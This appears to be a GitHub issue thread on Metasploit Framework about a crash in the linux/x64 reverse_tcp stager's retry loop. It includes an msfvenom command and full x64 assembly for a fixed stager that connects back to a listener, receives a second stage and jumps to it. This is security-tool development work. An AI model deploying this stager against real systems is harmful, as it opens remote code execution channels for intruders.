### ISSUE TITLE
Crash in payload/linux/x64/reverse_tcp retry loop

### ISSUE THREAD

**Issue by plestrin** [rapid7/metasploit-framework#9963]
## Abstract

payload/linux/x64/reverse_tcp crashes if it enters the retry loop (that is to say if the connect syscall fails). This bug is caused by improper stack management in the retry loop: new arguments are pushed on the stack in the loop body (asm blocks: `create_socket`, `connect` and `handle_failure`), but it is never cleaned. 

Note that everything is fine if the connect syscall succeed the first time. 

## How to reproduce?

1. generate the payload using msfvenom: `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -a x64 --platform linux`
2. run the payload and wait a few seconds (to execute at least one iteration of the retry loop)
3. run `multi/handler` in msfconsole

At this point the payload crashes with a seg fault.

## Possible fix

The bug is located in  `metasploit-framework/lib/msf/core/payload/linux/x64/reverse_tcp.rb`. For illustrating purpose I wrote a simple fix. Notice that I remove the socket creation from the retry loop. There is no need to create a new socket for each try.

```asm
_start:
	xor    rdi, rdi
	push   0x9
	pop    rax
	cdq
	mov    dh, 0x10
	mov    rsi, rdx
	xor    r9, r9
	push   0x22
	pop    r10
	mov    dl, 0x7
	syscall ;
	test   rax, rax
	js failed

	push   0xa ; retry counter hardcoded (example)
	pop    r9
	push   rsi ; FIX
	push   rax ; FIX

create_socket:
	push   0x29
	pop    rax
	cdq
	push   0x2
	pop    rdi
	push   0x1
	pop    rsi
	syscall
	test   rax, rax
	js failed
	push   rax ; FIX

connect:
	pop    rdi ; FIX
	push   rdi ; FIX
	mov    rcx, 0x100007F5C110002 ; port and IP hardcoded (example)
	push   rcx
	mov    rsi, rsp
	push   0x10
	pop    rdx
	push   0x2a
	pop    rax
	syscall
	test   rax, rax
	jns    recv

handle_failure:
	dec    r9
	jz     failed
	push   0x23
	pop    rax
	push   0x0 ; wait time hardcoded (example)
	push   0x5 ; wait time hardcoded (example)
	mov    rdi, rsp
	xor    rsi, rsi
	syscall
	add    rsp, 0x18 ; FIX, replace with pop for smaller code ?
	test   rax, rax
	jns    connect ; FIX
	jmp    failed

recv:
	add    rsp, 0x10 ; FIX, replace with pop for smaller code ?
	pop    rsi
	pop    rdx
	syscall
	test   rax, rax
	js     failed
	jmp    rsi

failed:
	push   0x3c
	pop    rax
	push   0x1
	pop    rdi
	syscall
```

**Comment by busterb** [comment]
Mind sending a PR or would you like us to do it?

**Comment by plestrin** [comment]
I tried to, but there is a size requirement in `spec/modules/payloads_spec.rb` that I don't quite understand. My PR got rejected by Travis. I leave it to you. Sorry.

**Comment by timwr** [comment]
Many thanks @plestrin 
I went ahead and landed your changes because it fixes the above issue.

Not creating a new socket each time is a good change, and more stealthy. I suspect some other stagers need to use this pattern too!
